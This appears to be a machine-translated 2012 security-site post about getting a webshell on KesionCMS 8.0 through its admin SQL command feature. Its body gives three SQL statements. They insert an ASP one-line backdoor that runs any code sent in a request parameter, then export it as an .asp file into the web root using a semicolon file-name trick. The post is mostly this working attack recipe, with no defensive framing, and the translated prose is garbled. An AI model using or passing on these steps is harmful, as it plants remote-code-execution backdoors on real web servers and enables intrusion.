kesionCMS 8.0 background holding shell vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201235219
Type myhack58
Reporter 佚名
Modified 2012-10-19T00:00:00


Some time ago Ghost brother, made a kesion arbitrary download vulnerability on the holding shell further generations. In fact, take the shell was very simple. Method of much is. Just a brother to me get a shell, I just made a to get the shell methods for your reference.

The point of sql command execution.

  1. create table 0ldgui (a varchar(5 0)) create a table\

  2. insert into 0ldgui (a) values ('<%execute request("0ldgui")%>') to insert the phrase

  3. select * into [a] in 'f:/web/0ldgui.asp;. xls' 'excel 4.0;' from 0ldgui export, in the database backup you can see the absolute path

Very common a asp sql to get the shell method